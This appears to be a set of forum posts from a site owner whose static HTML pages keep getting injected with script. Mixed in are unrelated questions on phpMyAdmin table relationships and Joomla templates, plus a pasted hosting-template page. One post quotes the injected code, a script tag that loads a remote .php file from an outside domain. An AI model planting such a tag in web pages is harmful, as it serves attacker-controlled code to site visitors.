joshbb

Hi, I am looking for HTML page that don't allow any kind of Java script. i.e. <script></script> tags.

-- I am using reseller hosting, and I dont have direct access to change my ftp -- I have to send request to owner of that software house to change ftp password. -- My account info is open to him also. -- Thats why I was thinking to change hosting. I have installed licensed Kaspersky 6.0.3 and Trojan remover. I dont think my pc have any types of trojans. Also note that XSS is very frequent means no have have much time to put XSS on about 50pages twice a day for so long time that is two months.

-- Mchl ! you mean I should change my hosting. -- Maybe this solve my problem, I was also intended to change hosting. -- Thanks for your feedback.

I mean as we create tables in SQL then we create relationship between tables by using primary and foreign key. How we will do that in phpmyadmin.

-- I created simple HTML with message this site is down for maintenance. Attacker XSS that simple html page also. -- I found on many forums that static page can't be XSS attacked. but How that guy do that. -- I need quick solution please.

Can any body help me how I create relationships i.e. normalize my tables using phpmyadmin.

Hi everybody, I have explored joomla and found good. But there are lots of things need to customize. Is there any development kit or way that template of joomla can easily customized. Please share your experience.

-- I changed my ftp password but XSS occur frequently. -- Note that attacker does not change the text of my pages. Also its not automatic script because I traced out attacking patterns, some time site is free from XSS for 2 or 3 days at weekend. -- What I realized is that attacker used his browser for submitting malware code into my site. I want a page that does not accept any inputs from client end. It shows only what is on that page.

-- I am amazed how that guy inject code to my static HTML page. -- Maybe he/she is using his browser to insert malicious code into HTML page. -- Also problem is that google places label on your site. I used webmaster tools and removed that label. But XSS is most frequent about twice a day. -- His injected code is as under: <script src=http://tdisac.com.pe/images/_vti_inf.php ></script> this is very serious problem with my site. Need help.

Please see following page: Template <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <link href="style.css" rel="stylesheet" type="text/css" /> <link href="layout.css" rel="stylesheet" type="text/css" /> <script src="js/cufon-yui.js" type="text/javascript"></script> <script src="js/cufon-replace.js" type="text/javascript"></script> <script src="js/Futura_Md_BT_italic_400.font.js" type="text/javascript"></script> <script src="js/Futura_Md_BT_italic_700.font.js" type="text/javascript"></script> <!--[if lt IE 7]> <link href="ie_style.css" rel="stylesheet" type="text/css" /> <![endif]--> </head> <body id="page1"> <!-- header --> <div id="header"> <div class="row-1"> <div class="container"> <div class="logo"><a href="index.html"><img alt="" src="images/logo.jpg" /></a></div> <ul class="nav"> <li><a href="index.html" class="current">Home</a>|</li> <li><a href="index-1.html">Hosting</a>|</li> <li><a href="#">Domains</a>|</li> <li><a href="#">Web Design</a>|</li> <li><a href="#">Support</a>|</li> <li><a href="#">Solutions</a>|</li> <li><a href="#">Affiliates</a>|</li> <li><a href="#">Contacts</a></li> </ul> </div> </div> <div class="row-2"> <div class="bg"> <div class="container"> <div class="indent"> <img alt="" src="images/slogan.jpg" /> <div class="indent"> <p>Professional web hosting with easy website builder, unlimited traffic and a range of advanced <a href="#">web hosting</a> tools included.</p> <a href="#"><img alt="" src="images/button.gif" /></a> </div> </div> </div> </div> </div> </div> <!-- content --> <div id="content" class="extra-bg"> <div class="row-1"> <div class="container"> <ul class="banners"> <li> <h2 class="icon1">Domain name</h2> <h4>Registrations from $9.50</h4> <ul> <li><a href="#">NEW: domain privacy</a></li> <li><a href="#">Easy domain trasfers</a></li> <li><a href="#">Advanced DNS control</a></li> <li><a href="#">Personalised e-mail</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> <li> <h2 class="icon2 alt">Dedicated <strong>servers</strong></h2> <h4>From $45.50 p/month</h4> <ul> <li><a href="#">50% OFF for 3 month</a></li> <li><a href="#">Unlimited bandwidth</a></li> <li><a href="#">Remote server control</a></li> <li><a href="#">Secure private network</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> <li> <h2 class="icon3">Broadband</h2> <h4>From $34.50 p/month</h4> <ul> <li><a href="#">Unlimited downloads</a></li> <li><a href="#">No ties or restrictions</a></li> <li><a href="#">Static IP addresses</a></li> <li><a href="#">Low cotention ratios</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> <li class="last"> <h2 class="icon4">Web hosting</h2> <h4>From only $3.59</h4> <ul> <li><a href="#">50% OFF for 3 month</a></li> <li><a href="#">Unlimited bandwidth</a></li> <li><a href="#">Windows & Linux</a></li> <li><a href="#">Easy website builder</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> </ul> <ul class="top-proposals"> <li><a href="#"><img alt="" src="images/banner1.jpg" /></a></li> <li class="last"><a href="#"><img alt="" src="images/banner1.jpg" /></a></li> </ul> </div> </div> <div class="row-2"> <div class="container"> <div class="wrapper"> <div class="col-1"> <h3>Dedicated</h3> Lorem ipsum dolor sit amet, consectetuer adipi- scing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo <a href="#"><img alt="" src="images/arrow2.gif" /></a> </div> <div class="col-2"> <h3>New Customer</h3> Ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo <a href="#"><img alt="" src="images/arrow2.gif" /></a> </div> <div class="col-3"> <h3>Transfer Customer</h3> Lorem ipsum dolor sit amet, consectetuer adipi- scing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo <a href="#"><img alt="" src="images/arrow2.gif" /></a> </div> </div> </div> </div> </div> <!-- footer --> <div id="footer"> <div class="container"> wEb hOSTING © 2010 <a href="index-2.html">Privacy Policy</a> </div> </div> <script type="text/javascript"> Cufon.now(); </script> </body> </html> How can I protect above page from XSS, these are only static pages. having no input from client.

Hi, I have my website in asp 2.0 which is CMS build from local vendor. It was vulnerable to XSS and facing XSS from last 2 months. Now I decided to put static HTML website with no inputs from client. Can some one provide guidlines.